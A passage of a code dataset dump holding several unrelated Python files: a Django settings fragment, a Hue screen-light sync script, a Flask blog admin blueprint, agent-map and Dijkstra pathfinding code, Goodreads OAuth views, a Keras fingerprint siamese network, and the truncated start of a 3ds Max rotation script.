'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n########## END STATIC FILE CONFIGURATION\n\n\n########## APP CONFIGURATION\nDJANGO_APPS = (\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n # Useful template tags:\n # 'django.contrib.humanize',\n\n # Admin\n 'django.contrib.admin',\n)\nTHIRD_PARTY_APPS = (\n 'south', # Database migration helpers:\n 'crispy_forms', # Form layouts\n 'avatar', # for user avatars\n)\n\n# Apps specific for this project go here.\nLOCAL_APPS = (\n 'users', # custom users app\n # Your stuff: custom apps go here\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\nINSTALLED_APPS += (\n # Needs to come last for now because of a weird edge case between\n # South and allauth\n 'allauth', # registration\n 'allauth.account', # registration\n 'allauth.socialaccount', # registration\n)\n########## END APP CONFIGURATION\n\n\n########## URL Configuration\nROOT_URLCONF = 'config.urls'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\nWSGI_APPLICATION = 'config.wsgi.application'\n########## End URL Configuration\n\n########## django-secure\nSECURE = False\nif SECURE:\n INSTALLED_APPS += (\"djangosecure\", )\n\n # set this to 60 seconds and then to 518400 when you can prove it works\n SECURE_HSTS_SECONDS = 60\n SECURE_HSTS_INCLUDE_SUBDOMAINS = True\n SECURE_FRAME_DENY = True\n SECURE_CONTENT_TYPE_NOSNIFF = True\n SECURE_BROWSER_XSS_FILTER = True\n SESSION_COOKIE_SECURE = True\n SESSION_COOKIE_HTTPONLY = True\n SECURE_SSL_REDIRECT = True\n########## end django-secure\n\n\n########## AUTHENTICATION CONFIGURATION\nAUTHENTICATION_BACKENDS = (\n \"django.contrib.auth.backends.ModelBackend\",\n \"allauth.account.auth_backends.AuthenticationBackend\",\n)\n\n# Some really nice defaults\nACCOUNT_AUTHENTICATION_METHOD = \"username\"\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = \"mandatory\"\n########## END AUTHENTICATION CONFIGURATION\n\n\n########## Custom user app defaults\n# Select the correct user model\nAUTH_USER_MODEL = \"users.User\"\nLOGIN_REDIRECT_URL = \"users:redirect\"\n########## END Custom user app defaults\n\n\n########## SLUGLIFIER\nAUTOSLUG_SLUGIFY_FUNCTION = \"slugify.slugify\"\n########## END SLUGLIFIER\n\n\n################## PRODUCTION SETTINGS\nif DEBUG:\n EMAIL_HOST = \"localhost\"\n EMAIL_PORT = 1025\n MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)\n INSTALLED_APPS += ('debug_toolbar',)\n\n INTERNAL_IPS = ('127.0.0.1',)\n\n DEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n 'SHOW_TEMPLATE_CONTEXT': True,\n }\nelse:\n\n TEMPLATE_DEBUG = DEBUG\n\n ########## SITE CONFIGURATION\n # Hosts/domain names that are valid for this site\n # See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\n ALLOWED_HOSTS = [\"*\"]\n ########## END SITE CONFIGURATION\n\n INSTALLED_APPS += (\"gunicorn\", )\n\n ########## STORAGE CONFIGURATION\n from S3 import CallingFormat\n from os import environ\n # See: http://django-storages.readthedocs.org/en/latest/index.html\n INSTALLED_APPS += (\n 'storages',\n )\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n AWS_ACCESS_KEY_ID = environ.get('AWS_ACCESS_KEY_ID', '')\n AWS_SECRET_ACCESS_KEY = environ.get('AWS_SECRET_ACCESS_KEY', '')\n AWS_STORAGE_BUCKET_NAME = environ.get('AWS_STORAGE_BUCKET_NAME', '')\n AWS_AUTO_CREATE_BUCKET = True\n AWS_QUERYSTRING_AUTH = False\n\n # AWS cache settings, don't change unless you know what you're doing:\n AWS_EXPIREY = 60 * 60 * 24 * 7\n AWS_HEADERS = {\n 'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,\n AWS_EXPIREY)\n }\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME\n ########## END STORAGE CONFIGURATION\n\n ########## EMAIL\n DEFAULT_FROM_EMAIL = environ.get('DEFAULT_FROM_EMAIL',\n '{{cookiecutter.project_name}} <{{cookiecutter.project_name}}-noreply@{{cookiecutter.doman_name}}>')\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.sendgrid.com')\n EMAIL_HOST_PASSWORD = os.environ.get('SENDGRID_PASSWORD', '')\n EMAIL_HOST_USER = os.environ.get('SENDGRID_USERNAME', '')\n EMAIL_PORT = environ.get('EMAIL_PORT', 587)\n EMAIL_SUBJECT_PREFIX = environ.get('EMAIL_SUBJECT_PREFIX', '[{{cookiecutter.project_name}}] ')\n EMAIL_USE_TLS = True\n SERVER_EMAIL = EMAIL_HOST_USER\n ########## END EMAIL\n\n########## TEMPLATE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n \"allauth.account.context_processors.account\",\n \"allauth.socialaccount.context_processors.socialaccount\",\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n # Your stuff: custom template context processers go here\n)\n\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\nTEMPLATE_DIRS = (\n join(BASE_DIR, 'templates'),\n)\n\nif DEBUG:\n TEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n )\nelse:\n TEMPLATE_LOADERS = (\n ('django.template.loaders.cached.Loader', (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n )),\n )\n########## END TEMPLATE CONFIGURATION\n\n\n########## LOGGING CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n########## END LOGGING CONFIGURATION\n\n########## CACHING\nfrom memcacheify import memcacheify\nCACHES = memcacheify()\n########## END CACHING\n\n\n########## Your stuff: Below this line define 3rd party libary settings\n\n","sub_path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"442740037","text":"import mss\nimport mss.tools\nfrom PIL import Image\nfrom phue import Bridge\nimport random\nimport time\n\ndef avg(image):\n color_tuple = [None, None, None]\n for channel in range(3):\n pixels = image.getdata(band=channel)\n values = []\n for pixel in pixels:\n values.append(pixel)\n color_tuple[channel] = sum (values)/len(values)\n return tuple(color_tuple)\n\ndef rgb_to_cie(rgb_tuple):\n red = rgb_tuple[0]\n green = rgb_tuple[1]\n blue = rgb_tuple[2]\n\n #Use the formula described in https://gist.github.com/popcorn245/30afa0f98eea1c2fd34d to get xy values.\n r = ((red + 0.055) / (1.055)) ** 2.4 if (red > 0.04045) else (red / 12.92)\n g = ((green + 0.055) / (1.055)) ** 2.4 if (green > 0.04045) else (green / 12.92)\n b = ((blue + 0.055) / (1.055)) ** 2.4 if (blue > 0.04045) else (blue / 12.92)\n\n X = r * 0.664511 + g * 0.154324 + b * 0.162028\n Y = r * 0.283881 + g * 0.668433 + b * 0.047685\n Z = r * 0.000088 + g * 0.072310 + b * 0.986039\n\n if((X + Y + Z) == 0):\n return (0, 0)\n\n cx = X / (X + Y + Z)\n cy = Y / (X + Y + Z)\n\n return (cx, cy)\n\ndef change_lights(mon, bulb, lights, monitor):\n # Capture a bbox using percent values\n left = monitor['left'] + monitor['width'] * mon // 100 # 0% from the left\n top = monitor['top'] + monitor['height'] * mon // 100 # 0% from the top\n right = left + 400 # 400px width\n lower = top + 400 # 400px height\n\n bbox = (left, top, right, lower)\n\n # Grab the picture\n # Using PIL would be something like:\n # im = ImageGrab(bbox=bbox)\n sct_img = sct.grab(bbox)\n\n '''# save as pngs\n output = 'output' + str(mon) + '.png'.format(**monitor)\n mss.tools.to_png(sct_img.rgb, sct_img.size, output=output)'''\n\n # Create an Image\n img = Image.new('RGB', sct_img.size)\n\n # Best solution: create a list(tuple(R, G, B), ...) for putdata()\n pixels = zip(sct_img.raw[2::4],\n sct_img.raw[1::4],\n sct_img.raw[0::4])\n img.putdata(list(pixels))\n\n rgb_tuple = avg(img)\n\n luma = 0.2126 * rgb_tuple[0] + 0.7152 * rgb_tuple[1] + 0.0722 * rgb_tuple[2]\n if luma > 100:\n luma = 100\n\n cx, cy = rgb_to_cie(rgb_tuple)\n\n lights[bulb].xy = [cx, cy]\n\n lights[bulb].brightness = int(luma * 2.54)\n\n print('set light to ', cx, ' ', cy)\n print('luminance: ', luma * 2.54)\n print()\n\nwhile True:\n\ttry:\n\t\tip = input(\"Enter the IP for the Bridge you would like to connect to: \")\n\t\tb = Bridge(ip)\n\t\tb.connect()\n\t\tbreak\n\texcept:\n\t\tprint(\"Could not connect to the Bridge, try again.\")\n\nlights = b.get_light_objects()\nprint(\"Hue lights found: \", len(lights))\n\nlight_sections = [0] * len(b.get_light_objects())\n\nfor i in range(len(lights)):\n\twhile True:\n\t\ttry:\n\t\t\tstring = input(\"Enter the percentage of the screen you would like light \" + str(i) + \" to represent: \")\n\t\t\tlight_sections[i] = int(string)\n\t\t\tbreak\n\t\texcept:\n\t\t\tprint(\"invalid input for light \" + str(i) + \"!\")\n\nwith mss.mss() as sct:\n while True:\n try:\n print(\"Monitor IDs:\")\n for i in range(len(sct.monitors)):\n print(\"\\tid: \", i)\n print(\"Monitor Details:\", sct.monitors)\n string = input(\"Enter the monitor you would like to use: \")\n monitor = sct.monitors[int(string)]\n break\n except:\n print(\"invalid input for the monitor!\")\n\n while True:\n for i in range(len(lights)):\n print(\"light\", i)\n change_lights(light_sections[i], i, lights, monitor)\n","sub_path":"light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"37091946","text":"import json\nimport os\nimport random\nimport string\nfrom datetime import datetime, timedelta\n\nfrom flask import (Blueprint, Response, abort, flash, redirect,\n render_template, request, send_from_directory, session,\n url_for)\nfrom PIL import Image\n\nfrom models.user_model import User\nfrom models.post_model import Post\nfrom utilities.login import *\n\nfrom models.database import *\n\npost_blueprint = Blueprint('post_blueprint', __name__)\n\n@post_blueprint.before_request\ndef before_request():\n db.session.expire_all()\n\n@post_blueprint.route('/', methods=['POST'])\ndef index():\n try:\n if check_session():\n return render_template('posts.html', posts=[json.loads(repr(post)) for post in Post.all()])\n else:\n return redirect('/')\n except Exception as error:\n return message(503, repr(error))\n\n\n@post_blueprint.route('/add', methods=['POST', 'GET'])\ndef add():\n if not check_session():\n return redirect('/')\n \n if request.method == 'POST':\n try:\n user = User.get(name=session['name'], email=session['email']).limit(1).all()[0]\n post = Post(author=user.id, title=request.form['title'], body=request.form['body'], picture=request.form['picture'], views=0)\n post.save()\n return message(200, post.id)\n \n except Exception as error:\n return message(503, repr(error))\n elif request.method == 'GET':\n try:\n \n return render_template('add_post.html', user={'name': session['name']})\n except Exception as error:\n return message(503, repr(error))\n\n@post_blueprint.route('/edit/<id>', methods=['GET', 'POST'])\ndef get(id):\n if not check_session():\n return redirect('/admin/')\n \n if request.method == 'GET':\n try:\n post = Post.get(id=id)\n \n if not post:\n return redirect('/admin/#posts')\n\n user = User.get(id=post.author).limit(1).all()[0]\n\n return render_template('post.html', post=json.loads(repr(post)), user=json.loads(repr(user)))\n except Exception as error:\n return message(503, repr(error))\n elif request.method =='POST':\n try:\n post = Post.get(id=id)\n\n if post:\n post.update(title=request.form['title'], timestamp=datetime.now(), body=request.form['body'])\n return message(200, 'OK')\n\n return message(503, 'Unknown error!')\n except Exception as error:\n return message(503, repr(error))\n\n@post_blueprint.route('/remove', methods=['POST'])\ndef remove():\n if not check_session():\n return redirect('/admin/')\n\n try:\n post = Post.get(id=request.form['id'])\n post.remove()\n return message(200, 'OK')\n except Exception as error:\n return message(503, repr(error))\n ","sub_path":"cgi-bin/admin/blueprints/post_blueprint.py","file_name":"post_blueprint.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"142001997","text":"import numpy as np\nclass Agent:\n\n def __init__(self,name,agent_local,agent_map,p,q,search_radius,max_speed,communication_radius):\n self.name = name\n self.agent_local = agent_local\n self.agent_map = agent_map\n self.p = p\n self.q = q\n self.search_radius = search_radius\n self.max_speed = max_speed\n self.communication_radius = communication_radius\n\n\n def SingleUp(self,cell_row,cell_column,surveillance_mat,bound): # 单图\n agent_cell = []\n value_array = np.array(self.agent_local)\n for i in range(cell_row):\n for j in range(cell_column):\n cell_coord = np.array([i, j])\n dist1 = np.linalg.norm(value_array - cell_coord)\n if dist1 <= self.search_radius: # 4为搜索范围\n agent_cell.append(cell_coord)\n for one in agent_cell:\n point = surveillance_mat[one[0]][one[1]]\n if point == 1:\n Q = self.agent_map[one[0]][one[1]] + np.log(float(self.q)/float(self.p))\n final_Q = max(min(Q,bound), -bound)\n self.agent_map[one[0]][one[1]] = final_Q\n\n else:\n Q = self.agent_map[one[0]][one[1]] + np.log(float(1-self.q)/float(1- self.p))\n final_Q = max(min(Q, bound), -bound)\n self.agent_map[one[0]][one[1]] = final_Q\n print(self.agent_map)\n\n def Neighbor(self,agent_list,allagent_list): # 邻居\n list_neighbor = []\n for key in agent_list:\n if np.linalg.norm(self.agent_local - np.array(agent_list[key])) <= self.communication_radius:\n list_neighbor.append(key)\n list_neighbor01 = []\n for one in allagent_list:\n if one in agent_list:\n list_neighbor01.append(1)\n else:\n list_neighbor01.append(0)\n return list_neighbor01\n\n\n def Fusion(self,list_neighbor01,N,map_array,allagent_list): # 融合\n d = sum(list_neighbor01)\n list_w = [float(1/N), float(1/N),float(1/N),float(1/N),float(1/N),float(1/N)]\n\n k = allagent_list.index(self.name)\n list_w[k] = 1-(float(d -1)/N)\n w = np.array(list_w)\n mat_w = w * np.array(list_neighbor01)\n i = 0\n fusion_map = np.zeros([25,25])\n for one in mat_w:\n fusion_map += one * map_array[i]\n i += 1\n self.agent_map = fusion_map\n\n\n def Voronoi(self):\n self.agent_local\n voronoi_cell = [[], [], []]\n return voronoi_cell\n\n\n def Move(self, voronoi_cell,area): # 移动\n mass = 0\n centroid_mole = 0\n for i in voronoi_cell:\n point = self.agent_map[i[0]][i[1]]\n density = np.exp(-2 * np.linalg.norm(point))\n mass += density * area\n centroid_mole += np.array(i) * density *area\n centroid = float(centroid_mole) /float(mass)\n speed = centroid - self.agent_local\n\n if np.linalg.norm(speed) <= 3:\n new_speed = speed\n else:\n new_speed = (3 /float(np.linalg.norm(speed))) * speed\n self.agent_local += new_speed\n\n\n\n","sub_path":"classAgent.py","file_name":"classAgent.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"252704377","text":"\"\"\"\nDefinition of views.\n\"\"\"\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.template import RequestContext\nfrom datetime import datetime\nfrom rauth.service import OAuth1Service\nfrom app.stats.stats import stats\n\ns=stats()\nservice = OAuth1Service(\n consumer_key=s.gc.client_key,\n consumer_secret=s.gc.client_secret,\n name='goodreads',\n request_token_url='http://www.goodreads.com/oauth/request_token',\n authorize_url='http://www.goodreads.com/oauth/authorize',\n access_token_url='http://www.goodreads.com/oauth/access_token',\n base_url='http://www.goodreads.com/'\n )\nrequest_token, request_token_secret = service.get_request_token(header_auth=True)\ndef home(request):\n \"\"\"Renders the home page.\"\"\"\n \n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Home Page',\n 'year':datetime.now().year,\n }\n )\n\ndef loginGoodreads(request):\n redirect_uri=request.build_absolute_uri('/loginGoodreadsAuth/')\n params = {\n 'scope': 'read_write',\n 'response_type': 'code',\n 'oauth_callback': redirect_uri\n }\n \n \n \n auth_url = service.get_authorize_url(request_token,**params)\n return redirect(auth_url)\n \ndef loginGoodreadsAuth(request):\n \n session=service.get_auth_session(request_token,request_token_secret)\n s.gc.authenticate(session.access_token,session.access_token_secret)\n s.currentUser=s.gc.user()\n s.authenticationFinal(s.gc)\n s.populate()\n context=s.crunch()\n return render(request,'app/stats.html',context)\n \n\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title':'About',\n 'message':'Your application description page.',\n 'year':datetime.now().year,\n }\n )\n","sub_path":"TheUnseenLibrary/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"99345828","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\ndef create_graph(): \n graph = {}\n for i in range(34):\n for j in range(34):\n graph[(i,j)] = {'visited':False, 'distance':np.inf, 'valid':True, 'parent': (0, 0)}\n if i in range(6,13) and j in range(4,11):\n if j >= 14-i:\n graph[(i,j)]['valid'] = False\n if i in range(14,18) and j in range(11,16):\n graph[(i,j)]['valid'] = False\n if i in range(9,13) and j in range(16,21):\n graph[(i,j)]['valid'] = False\n if i in range(18,25) and j in range(16,20):\n graph[(i,j)]['valid'] = False\n if i in range(20, 29) and j in range(6,20):\n if j <= 13*i/8 - 212/8:\n graph[(i,j)]['valid'] = False\n if (i in range(12,29) and j in range(25,29)) or (i in range(25,29) and j in range(22,26)):\n graph[(i,j)]['valid'] = False\n return graph\n\ndef dijkstra(graph, source):\n graph[source]['visited'] = True\n num_nodes_visited = 1\n graph[source]['distance'] = 0\n queue = [source]\n while (len(queue) != 0):\n current = queue.pop(0)\n for i in range(2):\n if current[0]+i <= 32:\n for j in range(2):\n if (current[1]+j) <= 32:\n if i != 0 or j != 0:\n neighbour = (current[0]+i, current[1]+j)\n if graph[neighbour]['valid'] == True:\n if i+j == 2:\n dis = math.sqrt(2)\n else:\n dis = 1\n if graph[neighbour]['visited'] == False:\n graph[neighbour]['visited'] = True\t\n num_nodes_visited += 1\t\t\t\t\t\t\t\n graph[neighbour]['parent'] = current\t\t\t\t\t\t\t\t\n graph[neighbour]['distance'] = graph[current]['distance'] + dis\n queue.append(neighbour)\n else:\n if graph[neighbour]['distance'] > graph[current]['distance'] + dis:\n graph[neighbour]['distance'] = graph[current]['distance'] + dis\n graph[neighbour]['parent'] = current\n queue.append(neighbour)\t\t\n path = [(32, 32)]\n parent = (32, 32)\n while parent != source:\n parent = graph[path[len(path)-1]]['parent']\n path.append(parent)\n min_distance = (graph[(32,32)]['distance'])\t\t\n print(\"Total Number of Nodes Visited:\", num_nodes_visited)\t\n return(min_distance, path)\n\nif __name__ == \"__main__\":\n g = create_graph()\n points = [x for x in g.keys() if not (g[x]['valid'])]\n x = [i[0] for i in points]\n y = [i[1] for i in points]\n plt.scatter(x,y) \n min_distance, path = dijkstra(g, (2,2))\n print(\"Minimum Distance:\", min_distance)\n x = [i[0] for i in path]\n y = [i[1] for i in path]\n plt.plot(x,y, 'r')\n plt.show()","sub_path":"dij.py","file_name":"dij.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"314129484","text":"#the plan is to train on Databases/FVC2006/DB_1A and then test on Databases/FVC2006/DB_1B \n#this version uses a fully connected layer, no convolutions.\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nimport random\nfrom keras.datasets import mnist\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Input, Lambda\nfrom keras.optimizers import Adam\nfrom keras.constraints import maxnorm\nfrom keras import backend as K\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nimport scipy\nfrom scipy import misc\n\n\n#same thing as cosine similarity\ndef euclidean_distance(vects):\n x, y = vects\n return K.sqrt(K.sum(K.square(x - y), axis=1, keepdims=True))\n\n#no clue what this does\ndef eucl_dist_output_shape(shapes):\n shape1, shape2 = shapes\n return (shape1[0], 1)\n\n#some type of loss function i think. figure out why they used this specific one later?\ndef contrastive_loss(y_true, y_pred):\n '''Contrastive loss from Hadsell-et-al.'06\n http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\n '''\n margin = 1\n return K.mean(y_true * K.square(y_pred) + (1 - y_true) * K.square(K.maximum(margin - y_pred, 0)))\n\n\n\n#the fingerprint version\ndef create_training_pairs(): \n '''Positive and negative pair creation.\n Alternates between positive and negative pairs.\n '''\n\n pairs = []\n labels = []\n\n for i in range(1, 141):\n for first in range(1, 13):\n for second in range(first, 13):\n firstName = 'Databases/FVC2006/DB1_A/'\n secondName = 'Databases/FVC2006/DB1_A/'\n firstName += str(i) + '_' + str(first) + '.bmp'\n secondName += str(i) + '_' + str(second) + '.bmp'\n\n im1 = misc.imread(firstName)\n im2 = misc.imread(secondName)\n im1 = im1.reshape(9216)\n im2 = im2.reshape(9216)\n pairs += [[im1, im2]]\n\n\n dn = random.randrange(1, 11)\n while dn == i:\n dn = random.randrange(1, 11)\n notMatchingName = 'Databases/FVC2006/DB1_A/' + str(dn) + '_' + str(second) + '.bmp'\n notMatching = misc.imread(notMatchingName)\n notMatching = notMatching.reshape(9216)\n pairs += [[im1, notMatching]]\n labels += [1, 0]\n return np.array(pairs), np.array(labels)\n\n\ndef create_testing_pairs(): \n '''Positive and negative pair creation.\n Alternates between positive and negative pairs.\n '''\n\n pairs = []\n labels = []\n\n for i in range(1, 11):\n for first in range(1, 13):\n for second in range(first, 13):\n firstName = 'Databases/FVC2006/DB1_B/'\n secondName = 'Databases/FVC2006/DB1_B/'\n firstName += str(i) + '_' + str(first) + '.bmp'\n secondName += str(i) + '_' + str(second) + '.bmp'\n\n im1 = misc.imread(firstName)\n im2 = misc.imread(secondName)\n im1 = im1.reshape(9216)\n im2 = im2.reshape(9216)\n pairs += [[im1, im2]]\n\n dn = random.randrange(1, 11)\n while dn == i:\n dn = random.randrange(1, 11)\n notMatchingName = 'Databases/FVC2006/DB1_B/' + str(dn) + '_' + str(second) + '.bmp'\n notMatching = misc.imread(notMatchingName)\n notMatching = notMatching.reshape(9216)\n pairs += [[im1, notMatching]]\n labels += [1, 0]\n\n return np.array(pairs), np.array(labels)\n\n\n\n\n \n\n\n#define the shared network. apparently 128 is good for gpus\ndef create_base_network(input_dim):\n '''Base network to be shared (eq. to feature extraction).\n '''\n seq = Sequential()\n seq.add(Dropout(0.2, input_shape=(input_dim,)))\n seq.add(Dense(128, activation='relu', W_constraint=maxnorm(1)))\n seq.add(Dropout(0.2))\n\n return seq\n\n\ndef compute_accuracy(predictions, labels):\n '''Compute classification accuracy with a fixed threshold on distances.\n '''\n return np.mean(labels == (predictions.ravel() > 0.5))\n\n# actual fingerprint part\n\n\n\n\ntr_pairs, tr_y = create_training_pairs()\nte_pairs, te_y = create_testing_pairs()\ntr_pairs = tr_pairs.astype('float32')\nte_pairs = te_pairs.astype('float32')\ntr_pairs /= 255\nte_pairs /= 255\n\ninput_dim = 9216\nnb_epoch = 15\n\n\n# network definition\nbase_network = create_base_network(input_dim)\n\n#uh, where do you even find the input documentation lmao. they didn't use this input thing in previous examples...\ninput_a = Input(shape=(input_dim,))\ninput_b = Input(shape=(input_dim,))\n\n# because we re-use the same instance `base_network`,\n# the weights of the network\n# will be shared across the two branches\n\n# SEEMS IMPORTANT\nprocessed_a = base_network(input_a)\nprocessed_b = base_network(input_b)\n#print (processed_a == processed_b) \n#wtf that printed out false ^ why do they share weights like so...whatever. not worth my time...\n\n#not a python lambda. this is a layer that performs a function (in this case, euclidean_distance) on the input\n#[processed_a, processed_b] is a dict to be fed into euclidean_distance\n# output_shape specifies the entire shape as a function of the input shape: output_shape = eucl_dist_output_shape(input_shape)\ndistance = Lambda(euclidean_distance, output_shape=eucl_dist_output_shape)([processed_a, processed_b])\n\n\npredictions = Dense(1, init='normal', activation='sigmoid')(distance)\n\nmodel = Model(input=[input_a, input_b], output=predictions)\n\nadam = Adam(lr=0.00001)\nmodel.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])\n\nhistory = model.fit([tr_pairs[:, 0], tr_pairs[:, 1]], tr_y,\n validation_data=([te_pairs[:, 0], te_pairs[:, 1]], te_y),\n batch_size=128,\n nb_epoch=nb_epoch)\n\n\n# compute final accuracy on training and test sets\npred = model.predict([tr_pairs[:, 0], tr_pairs[:, 1]])\ntr_acc = compute_accuracy(pred, tr_y) #compute_accuracy is a function defined above. fixed threshold = 0.5 --> if prediction > thresh then it says yes.\npred = model.predict([te_pairs[:, 0], te_pairs[:, 1]])\nte_acc = compute_accuracy(pred, te_y)\n\n#roc curve for testing\n#need to reshape pred for roc curve\nte_fpr, te_tpr, thresh = roc_curve(te_y, pred.ravel())\nte_auc = auc(te_fpr, te_tpr)\n\nplt.figure()\nlw = 2\nplt.plot(te_fpr, te_tpr, color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % te_auc)\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic example - training')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n#loss and accuracy history plot\n# list all data in history\nprint(history.history.keys())\n# summarize history for accuracy\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n#saving weights for later\n#model.save_weights('fingerprint_siamese_graph_ver_1_weights.h5')\n\n\n'''\n#looking to see if weights are shared or not\nfor layer in model.layers:\n weights = layer.get_weights()\n print(\"layer weight\")\n print(weights)\n print(\"layer norm\")\n print(np.linalg.norm(weights))\n'''\n\n\nprint('* Accuracy on training set: %0.2f%%' % (100 * tr_acc))\nprint('* Accuracy on test set: %0.2f%%' % (100 * te_acc))\n","sub_path":"fingerprint_siamese_graph_ver_1.py","file_name":"fingerprint_siamese_graph_ver_1.py","file_ext":"py","file_size_in_byte":7843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"499019560","text":"import MaxPlus\nimport math\n\nclass Quaternion_toEulerianAngle():\n def __init__(self, x, y, z, w):\n self.x = x\n self.y = y\n self.z = z\n self.w = w\n\n def X(self):\n t0 = +2.0 * (self.w * self.x + self.y * self.z)\n t1 = +1.0 - 2.0 * (self.x * self.x + pow(self.y, 2))\n X = math.degrees(math.atan2(t0, t1))\n return X\n\n def Y(self):\n t2 = +2.0 * (self.w * self.y - self.z * self.x)\n t2 = 1 if t2 > 1 else t2\n t2 = -1 if t2 < -1 else t2\n Y = math.degrees(math.asin(t2))\n return Y\n\n def Z(self):\n t3 = +2.0 * (self.w * self.z + self.x * self.y)\n t4 = +1.0 - 2.0 * (pow(self.y, 2) + self.z * self.z)\n Z = math.degrees(math.atan2(t3, t4))\n return Z\n\ndef SetRotation(obj, x, y, z):\n MaxPlus.INode.GetINodeByName(obj.Name) #selected\n\n getAngles = Quaternion_toEulerianAngle(obj.GetWorldRotation().X,\n obj.GetWorldRotation().Y,\n obj.GetWorldRotation().Z,\n obj.GetWorldRotation().W)\n\n rotateValue_X = MaxPlus.Quat(MaxPlus.AngAxis(1, 0, 0, math.radians(x*-1 - getAngles.X())))\n rotateValue_Y = MaxPlus.Quat(MaxPlus.AngAxis(0, 1, 0, math.radians(y*-1 - getAngles.Y())))\n rotateValue_Z = MaxPlus.Quat(MaxPlus.AngAxis(0, 0, 1, math.radians(z*-1 